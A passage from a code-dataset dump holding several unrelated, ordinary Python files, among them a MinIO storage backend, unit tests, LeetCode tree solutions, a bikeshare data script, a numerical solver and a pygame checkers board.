name):\n # type: (str) -> bool\n try:\n self.client.stat_object(self.bucket_name, self._sanitize_path(name))\n return True\n except ResponseError as error:\n if error.code == \"NoSuchKey\":\n return False\n else:\n logger.warn(error)\n raise IOError(\"Could not stat file {}\".format(name))\n\n def listdir(self, path):\n try:\n # TODO: break the path\n return self.client.list_objects(self.bucket_name, path)\n except ResponseError as error:\n logger.warn(error)\n raise IOError(\"Could not list directory {}\".format(path))\n\n def size(self, name):\n # type: (str) -> int\n try:\n info = self.client.stat_object(self.bucket_name, name)\n return info.size\n except ResponseError as error:\n logger.warn(error)\n raise IOError(\"Could not access file size for {}\".format(name))\n\n def url(self, name):\n # type: (str) -> str\n #if self.exists(name):\n # return self.client.presigned_get_object(self.bucket_name, name)\n #else:\n # raise IOError(\"This file does not exist\")\n return \"https://static.storekit.org/\" + self.bucket_name + \"/\" + name\n\n def accessed_time(self, name):\n # type: (str) -> datetime.datetime\n \"\"\"\n Not available via the S3 API\n \"\"\"\n return self.modified_time(name)\n\n def created_time(self, name):\n # type: (str) -> datetime.datetime\n \"\"\"\n Not available via the S3 API\n \"\"\"\n return self.modified_time(name)\n\n def modified_time(self, name):\n # type: (str) -> datetime.datetime\n try:\n info = self.client.stat_object(self.bucket_name, name)\n return datetime.datetime.fromtimestamp(info.last_modified)\n except ResponseError as error:\n logger.warn(error)\n raise IOError(\n \"Could not access modification time for file {}\".format(name))\n\n@deconstructible\nclass MinioMediaStorage(MinioStorage):\n def __init__(self):\n super(MinioMediaStorage, self).__init__()\n self.bucket_name = get_setting(\"MINIO_STORAGE_MEDIA_BUCKET_NAME\")\n # self.static_use_media_bucket = get_setting(\n # \"MINIO_STORAGE_STATIC_USE_MEDIA_BUCKET\")\n self.auto_create_media_bucket = get_setting(\n \"MINIO_STORAGE_AUTO_CREATE_MEDIA_BUCKET\", False)\n\n if self.auto_create_media_bucket and not self.client.bucket_exists(\n self.bucket_name):\n self.client.make_bucket(self.bucket_name)\n elif not self.client.bucket_exists(self.bucket_name):\n raise IOError(\"The media bucket does not exist\")\n\n\n@deconstructible\nclass MinioStaticStorage(MinioStorage):\n def __init__(self):\n super(MinioStaticStorage, self).__init__()\n self.bucket_name = get_setting(\"MINIO_STORAGE_STATIC_BUCKET_NAME\")\n self.auto_create_static_bucket = get_setting(\n \"MINIO_STORAGE_AUTO_CREATE_STATIC_BUCKET\", False)\n\n if self.auto_create_static_bucket and not self.client.bucket_exists(\n self.bucket_name):\n self.client.make_bucket(self.bucket_name)\n elif not self.client.bucket_exists(self.bucket_name):\n raise IOError(\"The static bucket does not exist\")\n","sub_path":"minio_storage/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":6654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"493315579","text":"import datetime\n\nimport pytest\nfrom pytest_bdd import given, scenario, then, when\n\nfrom models import AgreementType, BudgetLineItem, BudgetLineItemStatus, ContractAgreement, ContractType, DirectAgreement\n\n\n@pytest.fixture()\ndef contract_agreement(loaded_db):\n contract_agreement = ContractAgreement(\n name=\"Feature Test Contract\",\n number=\"BDD0999\",\n contract_number=\"CT0999\",\n contract_type=ContractType.RESEARCH,\n agreement_type=AgreementType.CONTRACT,\n research_project_id=1,\n )\n loaded_db.add(contract_agreement)\n loaded_db.commit()\n\n yield contract_agreement\n\n loaded_db.delete(contract_agreement)\n loaded_db.commit()\n\n\n@pytest.fixture()\ndef contract_with_draft_bli(loaded_db, contract_agreement):\n draft_bli = BudgetLineItem(\n agreement_id=contract_agreement.id,\n comments=\"blah bleh bleh blah\",\n line_description=\"LI Draft\",\n amount=100.12,\n can_id=1,\n date_needed=datetime.date(2043, 1, 1),\n status=BudgetLineItemStatus.DRAFT,\n psc_fee_amount=1.23,\n created_by=1,\n )\n loaded_db.add(draft_bli)\n loaded_db.commit()\n\n yield contract_agreement\n\n loaded_db.delete(draft_bli)\n loaded_db.commit()\n\n\n@pytest.fixture()\ndef contract_with_planned_bli(loaded_db, contract_agreement):\n planned_bli = BudgetLineItem(\n agreement_id=contract_agreement.id,\n comments=\"blah blah bleh blah\",\n line_description=\"LI Planned\",\n amount=200.24,\n can_id=1,\n date_needed=datetime.date(2043, 1, 1),\n status=BudgetLineItemStatus.PLANNED,\n psc_fee_amount=2.34,\n created_by=1,\n )\n loaded_db.add(planned_bli)\n loaded_db.commit()\n\n yield contract_agreement\n\n loaded_db.delete(planned_bli)\n loaded_db.commit()\n\n\n@pytest.fixture()\ndef direct_agreement(loaded_db):\n direct_agreement = DirectAgreement(\n name=\"Feature Test Direct\",\n number=\"BDD0969\",\n payee=\"Somebody who needs money\",\n agreement_type=AgreementType.DIRECT_ALLOCATION,\n research_project_id=1,\n )\n loaded_db.add(direct_agreement)\n loaded_db.commit()\n\n yield direct_agreement\n\n loaded_db.delete(direct_agreement)\n loaded_db.commit()\n\n\n@scenario(\"delete_agreement.feature\", \"Contract Agreement with only draft BLIs\")\ndef test_contract_draft_bli():\n pass\n\n\n@scenario(\"delete_agreement.feature\", \"Contract Agreement with non-draft BLIs\")\ndef test_contract_non_draft_bli():\n pass\n\n\n@scenario(\"delete_agreement.feature\", \"Non-Contract Agreement\")\ndef test_non_contract():\n pass\n\n\n@given(\"I am logged in as an OPS user with the correct authorization\", target_fixture=\"client\")\ndef client(auth_client):\n # TODO: Authorization stuff\n return auth_client\n\n\n@given(\"I have a contract agreement with only draft BLIs\", target_fixture=\"agreement\")\ndef contract_draft_bli(contract_with_draft_bli):\n return contract_with_draft_bli\n\n\n@given(\"I have a contract agreement with non-draft BLIs\", target_fixture=\"agreement\")\ndef contract_non_draft_bli(contract_with_planned_bli):\n return contract_with_planned_bli\n\n\n@given(\"I have a non-contract agreement\", target_fixture=\"agreement\")\ndef non_contract(direct_agreement):\n return direct_agreement\n\n\n@when(\"I delete the agreement\", target_fixture=\"submit_response\")\ndef delete_agreement(client, agreement):\n resp = client.delete(f\"/api/v1/agreements/{agreement.id}\")\n return resp\n\n\n@then(\"I should get a message that it was successful\")\ndef delete_success(submit_response):\n assert submit_response.status_code == 200\n\n\n@then(\"I should get an error message that it's invalid\")\ndef delete_failure(submit_response):\n assert submit_response.status_code == 400\n","sub_path":"backend/ops_api/tests/ops/features/test_delete_agreement.py","file_name":"test_delete_agreement.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122078019","text":"\"\"\"\n199. Binary Tree Right Side View\n- Medium\n- Tree, DFS, BFS, Recursion, Queue\n- Link: https://leetcode.com/problems/binary-tree-right-side-view/\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n# Solution 1: BFS\n# Time: O(N) | Space: O(N) - skewed tree\n# [With List]\nclass Solution:\n def rightSideView(self, root: TreeNode) -> List[int]:\n ans = []\n if not root:\n return ans\n\n curLevel = [root]\n\n while curLevel:\n ans.append(curLevel[-1].val)\n nextLevel = []\n for node in curLevel:\n if node.left:\n nextLevel.append(node.left)\n if node.right:\n nextLevel.append(node.right)\n\n curLevel = nextLevel\n return ans\n\n# [With Deque]\nclass Solution:\n def rightSideView(self, root: TreeNode) -> List[int]:\n ans = []\n if not root: return ans\n \n nextLevel = deque([root,])\n \n while nextLevel:\n curLevel = nextLevel\n nextLevel = deque()\n while curLevel:\n node = curLevel.popleft()\n \n if node.left:\n nextLevel.append(node.left)\n if node.right:\n nextLevel.append(node.right)\n ans.append(node.val)\n return ans\n \n\n# Solution 2: One deque with size measurement\n# 計算當下 deque 的長度的同時也限制了 list iteration 的次數\n# Time: O(N) | Space: O(N) - skewed tree\nclass Solution:\n def rightSideView(self, root: TreeNode) -> List[int]:\n ans = []\n if not root: return ans\n \n q = deque([root,])\n \n while q:\n level_length = len(q)\n \n for i in range(level_length): # 跑完後會進行下一個 level 的計算\n node = q.popleft()\n \n if i == level_length - 1:\n ans.append(node.val)\n \n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n return ans\n","sub_path":"leetcode/199_binary_tree_right_side_view.py","file_name":"199_binary_tree_right_side_view.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"464932957","text":"# Copyright 2015 0xc0170\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\nimport shutil\n\nimport yaml\nfrom unittest import TestCase\n\nfrom project_generator.project import Project\nfrom project_generator.generate import Generator\n\nproject_1_yaml = {\n 'common': {\n 'sources': ['test_workspace/main.cpp'],\n 'includes': ['test_workspace/header1.h'],\n 'macros': ['MACRO1', 'MACRO2'],\n 'target': ['target1'],\n 'core': ['core1'],\n 'tools_supported': ['iar_arm', 'uvision', 'coide', 'unknown'],\n 'output_type': ['exe'],\n 'debugger': ['debugger_1'],\n 'linker_file': ['test_workspace/linker.ld'],\n }\n}\n\nprojects_yaml = {\n 'projects': {\n 'project_1' : ['test_workspace/project_1.yaml']\n },\n 'settings' : {\n 'definitions_dir': ['./notpg/path/somewhere'],\n 'export_dir': ['projects/{workspace}/{tool}_{target}/{project_name}']\n }\n}\n\ndef test_output_directory_formatting():\n path, depth = Project._generate_output_dir('aaa/bbb/cccc/ddd/eee/ffff/ggg')\n\n assert depth == 7\n assert os.path.normpath(path) == os.path.normpath('../../../../../../../')\n\nclass TestProject(TestCase):\n\n \"\"\"test things related to the Project class\"\"\"\n\n def setUp(self):\n if not os.path.exists('test_workspace'):\n os.makedirs('test_workspace')\n # write project file\n with open(os.path.join(os.getcwd(), 'test_workspace/project_1.yaml'), 'wt') as f:\n f.write(yaml.dump(project_1_yaml, default_flow_style=False))\n # write projects file\n with open(os.path.join(os.getcwd(), 'test_workspace/projects.yaml'), 'wt') as f:\n f.write(yaml.dump(projects_yaml, default_flow_style=False))\n\n # now that Project and PgenWorkspace accepts dictionaries, we dont need to\n # create yaml files!\n self.project = next(Generator(projects_yaml).generate('project_1'))\n\n # create 3 files to test project\n with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:\n pass\n with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:\n pass\n with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:\n pass\n\n def tearDown(self):\n # remove created directory\n shutil.rmtree('test_workspace', ignore_errors=True)\n shutil.rmtree('projects', ignore_errors=True)\n\n def test_project_yaml(self):\n # test using yaml files and compare basic data\n project = next(Generator('test_workspace/projects.yaml').generate('project_1'))\n assert self.project.name == project.name\n # fix this one, they should be equal\n #self.assertDictEqual(self.project.project, project.project)\n\n def test_name(self):\n assert self.project.name == 'project_1'\n\n def test_copy(self):\n # test copy method which shojld copy all files to generated project dir by default\n self.project._fill_export_dict('uvision')\n self.project._copy_sources_to_generated_destination()\n\n def test_set_output_dir_path(self):\n self.project._fill_export_dict('uvision')\n assert self.project.project['export']['output_dir']['path'] == os.path.join('projects', 'uvision_target1','project_1')\n","sub_path":"tests/test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"295988395","text":"import time\r\nimport pandas as pd\r\nimport numpy as np\r\n#Dictionary of csv file we will use\r\nCITY_DATA = { 'chicago': 'chicago.csv',\r\n 'new york city': 'new_york_city.csv',\r\n 'washington': 'washington.csv' }\r\n\r\ndef get_filters():\r\n \"\"\"\r\n Asks user to specify a city, month, and day to analyze.\r\n\r\n Returns:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n \"\"\"\r\n print('Hello! Let\\'s explore some US bikeshare data!')\r\n city = ''\r\n month = ''\r\n day = ''\r\n while not city in CITY_DATA.keys():\r\n city = input('What is the name of the city you would like to analyze chicago, new york city or washington\\n')\r\n \r\n month_list = ['all', 'january', 'february', 'march', 'april', 'may', 'june', 'july',\r\n 'august', 'september', 'october', 'november', 'december']\r\n while not month in month_list:\r\n month = input(\"Please select a month all, january, february, ... , june\\n\")\r\n if month != 'all':\r\n month = month_list.index(month)\r\n days_in_week = ['all', 'monday','sunday','tuesday','wednesday','thursday', 'friday', 'saturday']\r\n while day not in days_in_week:\r\n day = input(\"Please select a day of the week all, monday, tuesday, ... sunday\\n\")\r\n \r\n print('-'*40)\r\n return city, month, day\r\n\r\n\r\ndef load_data(city, month, day):\r\n \"\"\"\r\n Loads data for the specified city and filters by month and day if applicable.\r\n\r\n Args:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n Returns:\r\n df - Pandas DataFrame containing city data filtered by month and day\r\n \"\"\"\r\n df = pd.read_csv(CITY_DATA[city])\r\n df['Start Time'] = pd.to_datetime(df['Start Time']) \r\n df['month'] = df['Start Time'].dt.month\r\n df['day_of_week'] = df['Start Time'].dt.weekday_name\r\n\r\n if month != 'all': \r\n df = df.query('month == 1'.format(month))\r\n \r\n if day != 'all':\r\n df = df.query('day_of_week == \"{}\"'.format(day.title()))\r\n return df\r\n\r\n\r\ndef time_stats(df, city, month, day):\r\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\r\n\r\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\r\n start_time = time.time()\r\n\r\n if month == \"all\":\r\n month_list = ['all', 'january', 'february', 'march', 'april', 'may', 'june', 'july',\r\n 'august', 'september', 'october', 'november', 'december']\r\n most_common_month_index = df['month'].mode()[0]\r\n month_name = month_list[most_common_month_index]\r\n print(\"The month {} had the most travel is {}\\n\".format(city, month_name.title()))\r\n\r\n if day == \"all\":\r\n print(\"The day {} had the most travel is {}\\n\".format(city, df['day_of_week'].mode()[0]))\r\n df['hour'] = df['Start Time'].dt.hour\r\n print(\"The hour {} has the most travel was {}\".format(city, df['hour'].mode()[0]))\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef station_stats(df, city):\r\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\r\n\r\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\r\n start_time = time.time()\r\n\r\n print(\"The most common used start station for {} was {}\\n\".format(city, df['Start Station'].mode()[0])) \r\n\r\n print(\"The most common used end station for {} was {}\\n\".format(city, df['End Station'].mode()[0])) \r\n\r\n n_combos = df.groupby(['Start Station', 'End Station']).size().nlargest(1)\r\n print('The most frequent combination of in {} was \\n{}\\n'.format(city,n_combos))\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef trip_duration_stats(df, city):\r\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\r\n\r\n print('\\nCalculating Trip Duration...\\n')\r\n start_time = time.time()\r\n\r\n print(\"The total travel time for {} was {} minutes\".format(city,df['Trip Duration'].sum() / 60 ))\r\n\r\n print('The average travel time for {} was {} minutes'.format(city, df['Trip Duration'].mean()/60))\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef user_stats(df, city):\r\n \"\"\"Displays statistics on bikeshare users.\"\"\"\r\n\r\n print('\\nCalculating User Stats...\\n')\r\n start_time = time.time()\r\n\r\n usertypes = df.groupby('User Type')['User Type'].count()\r\n print('The count of each type of user in {} is \\n{}\\n'.format(city, usertypes))\r\n if 'Gender' in df.columns:\r\n gendertypes = df.groupby('Gender')['Gender'].count()\r\n print('The count of each gender in {} are \\n{}\\n'.format(city, gendertypes))\r\n if 'Birth Year' in df.columns:\r\n print('In {} \\nthe most common year of birth was {}\\nthe most recent year of birth was {}\\nthe most recent year of birth was {}\\n'\r\n .format(city, df['Birth Year'].mode()[0], df['Birth Year'].max(), df['Birth Year'].min()))\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef main():\r\n while True:\r\n city, month, day = get_filters()\r\n df = load_data(city, month, day)\r\n time_stats(df,city, month, day)\r\n station_stats(df, city)\r\n trip_duration_stats(df, city)\r\n user_stats(df, city)\r\n\r\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\r\n if restart.lower() != 'yes':\r\n break\r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"38066784","text":"import numpy as np\r\n\r\ndef isDDM(m, n):\r\n for i in range(0, n):\r\n sum = 0\r\n for j in range(0, n):\r\n sum = sum + abs(m[i][j])\r\n\r\n sum = sum - abs(m[i][i])\r\n\r\n if (abs(m[i][i]) < sum):\r\n return False\r\n\r\n return True\r\n\r\ndef seidel(A, b, eps):\r\n n = len(A)\r\n x = np.zeros(n)\r\n\r\n converge = False\r\n Iteration = 0\r\n if ((isDDM(A, n))):\r\n while not converge:\r\n x_new = np.copy(x)\r\n for i in range(n):\r\n s1 = sum(A[i][j] * x_new[j] for j in range(i))\r\n s2 = sum(A[i][j] * x[j] for j in range(i + 1, n))\r\n x_new[i] = (b[i] - s1 - s2) / A[i][i]\r\n\r\n converge = np.sqrt(sum((x_new[i] - x[i]) ** 2 for i in range(n))) <= eps\r\n Iteration += 1\r\n x = x_new\r\n print('Кількість ітерацій :', Iteration)\r\n print('Кількість ітерацій :', x)\r\n return x\r\n else:\r\n return \"Не розв'язується\"\r\n\r\n\r\nA = np.array([[4, -1, -1, 0],\r\n [-1, 4, 0, -1],\r\n [-1, 0, 4, -1],\r\n [0, -1, -1, 4]])\r\n\r\nb = np.array([2, 2, 2, 2])\r\neps = 0.1\r\nprint('Рішення :', seidel(A, b, eps))","sub_path":"чмла3.py","file_name":"чмла3.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"177908999","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/jennyq/.pyenv/versions/venv_t12/lib/python3.7/site-packages/tendenci/apps/corporate_memberships/migrations/0005_auto_20151120_1552.py\n# Compiled at: 2020-03-30 17:48:03\n# Size of source mod 2**32: 617 bytes\nfrom django.db import migrations\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('corporate_memberships', '0004_auto_20151120_1538')]\n operations = [\n migrations.RemoveField(model_name='corporatemembershiptype',\n name='apply_threshold'),\n migrations.RemoveField(model_name='corporatemembershiptype',\n name='individual_threshold'),\n migrations.RemoveField(model_name='corporatemembershiptype',\n name='individual_threshold_price')]","sub_path":"pycfiles/tendenci-12.0.3-py3-none-any/0005_auto_20151120_1552.cpython-37.py","file_name":"0005_auto_20151120_1552.cpython-37.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"74168961","text":"\"\"\"\n中序遍历,左右指针串联\n\"\"\"\nclass TreeNode:\n def __init__(self, x, l=None, r=None):\n self.val = x\n self.lc = l\n self.rc = r\n\ndef convert(root):\n if not root:\n return None\n stack = []\n head = None\n pre = None\n p = root\n while p or stack:\n while p:\n stack.append(p)\n p = p.lc\n\n p = stack.pop()\n if not head:\n head = p\n pre = p\n else:\n pre.rc = p\n p.lc = pre\n pre = p\n\n p = p.rc\n\n return head\n\nroot = TreeNode(4, TreeNode(2, TreeNode(1), TreeNode(3)), TreeNode(5, r=TreeNode(6)))\nhead = convert(root)\np = head\nprint(p.rc.rc.rc.rc.lc.val, '4')\nwhile p:\n print(p.val)\n p = p.rc","sub_path":"剑指offer/026-二叉搜索树与双向链表/BST2BiList.py","file_name":"BST2BiList.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"445351781","text":"'''\n File name: findDerivatives.py\n Author: Tarmily Wen\n Date created: Dec. 8, 2019\n'''\n\nimport numpy as np\nfrom scipy import signal\nimport cv2\n\n'''\n File clarification:\n Compute gradient put ginformation of the inrayscale image\n - Input I_gray: H x W matrix as image\n - Output Mag: H x W matrix represents the magnitude of derivatives\n - Output Magx: H x W matrix represents the derivatives along x-axis\n - Output Magy: H x W matrix represents the derivatives along y-axis\n - Output Ori: H x W matrix represents the orientation of derivatives\n'''\n\n\ndef findDerivatives(I_gray):\n # smoothing kernels\n gaussian = np.array(\n [[2, 4, 5, 4, 2], [4, 9, 12, 9, 4], [5, 12, 15, 12, 5], [4, 9, 12, 9, 4], [2, 4, 5, 4, 2]]) / 159.0\n\n # kernel for x and y gradient\n dx = np.asarray([[-1.0, 0.0, 1.0], [-2.0, 0.0, 2.0], [-1.0, 0.0, 1.0]])\n dy = np.asarray([[1.0, 2.0, 1.0], [0.0, 0.0, 0.0], [-1.0, -2.0, -1.0]])\n\n ###############################################################################\n # Your code here: calculate the gradient magnitude and orientation\n ###############################################################################\n\n Gx= signal.convolve2d(gaussian, np.rot90(dx, 2), 'same')\n Gy= signal.convolve2d(gaussian, np.rot90(dy, 2), 'same')\n\n Magx = signal.convolve2d(I_gray, np.rot90(Gx, 2), 'same')\n Magy = signal.convolve2d(I_gray, np.rot90(Gy, 2), 'same')\n\n Mag = np.sqrt(Magx*Magx+Magy*Magy)\n\n Ori = np.arctan2(Magy, Magx)/np.pi*180\n\n return Mag, Magx, Magy, Ori\n\n\nif __name__ == '__main__':\n I_g = np.arange(0, 81, 1)\n I_g = I_g.reshape(9, 9)\n findDerivatives(I_g)\n","sub_path":"projects/project4CannyEdge/Code/findDerivatives.py","file_name":"findDerivatives.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"530372629","text":"import pygame\n\ndef draw_board():\n \"\"\" Draw the board for the checkers game \"\"\"\n\n pygame.init()\n colors = [(245, 222, 179), (139, 69, 19)] # Set up colors [saddlebrown, wheat]\n\n n = 10 # 8x8 Board, so n = 8\n surface_sz = 480 # Proposed physical surface size.\n sq_sz = surface_sz // n # sq_sz is length of a square.\n surface_sz = n * sq_sz # Adjust to exactly fit n squares.\n\n # Create the surface of (width, height), and its window.\n surface = pygame.display.set_mode((surface_sz, surface_sz))\n\n # Loading the images\n black_checker = pygame.image.load(\"images/black_checker.png\")\n white_checker = pygame.image.load(\"images/white_checker.png\")\n black_king = pygame.image.load(\"images/black_king.png\")\n white_king = pygame.image.load(\"images/white_king.png\")\n\n # Use an extra offset to centre the ball in its square.\n # If the square is too small, offset becomes negative,\n # but it will still be centered :-)\n ball_offset = (sq_sz - black_checker.get_width()) // 2\n\n while True:\n\n # Look for an event from keyboard, mouse, etc.\n ev = pygame.event.poll()\n if ev.type == pygame.QUIT:\n break\n\n # Draw a fresh background (a blank chess board)\n for row in range(n): # Draw each row of the board.\n c_index = row % 2 # Alternate starting color\n for col in range(n): # Run through cols drawing squares\n the_square = (col * sq_sz, row * sq_sz, sq_sz, sq_sz)\n surface.fill(colors[c_index], the_square)\n # Now flip the color index for the next square\n c_index = (c_index + 1) % 2\n\n # Now that squares are drawn, draw the pieces.\n for col in range(0, 10, 2):\n for row in range(0, 4):\n if row % 2 == 0:\n surface.blit(black_checker, (col * sq_sz + ball_offset + sq_sz, row * sq_sz + ball_offset))\n elif row % 2 == 1:\n surface.blit(black_checker, (col * sq_sz + ball_offset, row * sq_sz + ball_offset))\n\n for col in range(0, 10, 2):\n for row in range(6, 10):\n if row % 2 == 0:\n surface.blit(white_checker, (col * sq_sz + ball_offset + sq_sz, row * sq_sz + ball_offset))\n elif row % 2 == 1:\n surface.blit(white_checker, (col * sq_sz + ball_offset, row * sq_sz + ball_offset))\n\n\n pygame.display.flip()\n\n pygame.quit()\n\nif __name__ == \"__main__\":\n draw_board()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"207904731","text":"\n\nfrom xai.brain.wordbase.nouns._bitter import _BITTER\n\n#calss header\nclass _BITTERER(_BITTER, ):\n\tdef __init__(self,): \n\t\t_BITTER.__init__(self)\n\t\tself.name = \"BITTERER\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"bitter\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_bitterer.py","file_name":"_bitterer.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"545298529","text":"\nfrom format_text import format_text\nfrom item import ItemContainer\n\n\nclass Room:\n def __init__(self, name, description, items=[]):\n self.name = name\n self.description = description\n self.items = ItemContainer(items)\n\n def __str__(self):\n return (\n format_text(f\"You are standing in the {self.name}\")\n + \"\\n\"\n + format_text(self.description)\n )\n\n def move(self, direction):\n try:\n return getattr(self, f\"{direction}_to\")\n except AttributeError:\n #print (f\"Error: No room found for direction '{direction}'\")\n return None\n","sub_path":"src/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"90790869","text":"\"\"\"This is interesting because it ssh connects to a remote server. I used it for prototyping, but it wasn't very\nhelpful because of how the databases were being managed within the script. I couldn't use this in command, that is. \"\"\"\nimport os\nimport pandas as pd\nfrom pymongo import MongoClient\nfrom sshtunnel import SSHTunnelForwarder\nimport ast\nimport sys\nimport json\nimport datetime\nimport numpy as np\nimport pandas as pd\nfrom pymongo import MongoClient\n\npd.set_option('max_columns', 1000)\npd.set_option('max_info_columns', 1000)\npd.set_option('expand_frame_repr', False)\npd.set_option('display.max_rows', 30000)\npd.set_option('max_colwidth', 4000)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\n\nclient = MongoClient()\n# db_number = client['math_book_info']\n# db_origin = client['math_exercise_origins']\n# db_performance = client['math_performance']\n\n\n\ndef the_big_one(book, df_number, df_origin, df_performance):\n # todo: maybe just remove the offending documents from the database\n if 'chapter' in df_performance.columns.tolist():\n df_performance.drop('chapter', 1, inplace=True)\n if 'miss_list' in df_performance.columns.tolist():\n df_performance.drop('miss_list', 1, inplace=True)\n\n df_performance = df_performance. \\\n query('date == date'). \\\n assign(date=pd.to_datetime(df_performance['date'])). \\\n sort_values(['date', 'start_chapter', 'start_problem'])\n\n df_performance['end_chapter'] = df_performance['end_chapter'].astype(str)\n df_performance_test = df_performance.loc[df_performance['end_chapter'].str.contains('test', na=False)]\n df_performance_ass = df_performance.loc[~df_performance['end_chapter'].str.contains('test', na=False)]\n\n # these columns have different types across the various collections, which makes for a bit of a headache\n df_performance_ass['start_chapter'] = df_performance_ass['start_chapter'].astype(float).astype(int)\n df_performance_ass['end_chapter'] = df_performance_ass['end_chapter'].astype(float).astype(int)\n\n # assignments\n start_chapter_ass = df_performance_ass['start_chapter'].iloc[0]\n start_problem_ass = df_performance_ass['start_problem'].iloc[0]\n if isinstance(start_problem_ass, int):\n start_problem_ass = str(start_problem_ass)\n\n end_chapter_ass = df_performance_ass['end_chapter'].iloc[-1]\n end_problem_ass = df_performance_ass['end_problem'].iloc[-1]\n if isinstance(end_problem_ass, int):\n end_problem_ass = str(end_problem_ass)\n\n alphabet = 'abcdefghijklmnopqrstuvwxyz'\n df_grande_ass = pd.DataFrame()\n for chapter in range(int(float(start_chapter_ass)), int(float(end_chapter_ass)) + 1):\n df_temp = pd.DataFrame()\n lesson_probs = df_number.query('chapter == {}'.format(chapter)).iloc[0]['num_lesson_probs']\n mixed_probs = int(df_number.query('chapter == {}'.format(chapter)).iloc[0]['num_mixed_probs'])\n origin_probs = df_origin.query('chapter == {}'.format(chapter)).iloc[0]['origin_list']\n if isinstance(origin_probs, str):\n origin_probs = ast.literal_eval(origin_probs)\n missed_probs = []\n for dic in df_performance_ass.query('start_chapter == {}'.format(chapter))['miss_lst'].values.tolist() + df_performance_ass.query('end_chapter == {}'.format(chapter))['miss_lst'].values.tolist():\n try:\n missed_probs += dic[str(chapter)]\n except:\n pass\n missed_probs = list(set(missed_probs))\n\n if start_chapter_ass == end_chapter_ass:\n if start_problem_ass.isdigit():\n problem_lst = range(int(start_problem_ass), int(end_problem_ass) + 1)\n origin_lst = origin_probs[int(start_problem_ass): int(end_problem_ass) + 1]\n\n else:\n # I'm assuming the end_problem would not also be a letter\n start_ind = alphabet.find(start_problem_ass)\n end_ind = alphabet.find(lesson_probs)\n problem_lst = list(alphabet[start_ind: end_ind + 1]) + list(range(1, int(end_problem_ass) + 1))\n origin_lst = (end_ind - start_ind + 1) * [np.nan] + origin_probs[: int(end_problem_ass)]\n\n else:\n if chapter == start_chapter_ass:\n if start_problem_ass.isdigit():\n problem_lst = list(range(int(start_problem_ass), mixed_probs + 1))\n origin_lst = origin_probs[int(start_problem_ass) - 1:]\n\n else:\n start_ind = alphabet.find(start_problem_ass)\n end_ind = alphabet.find(lesson_probs)\n 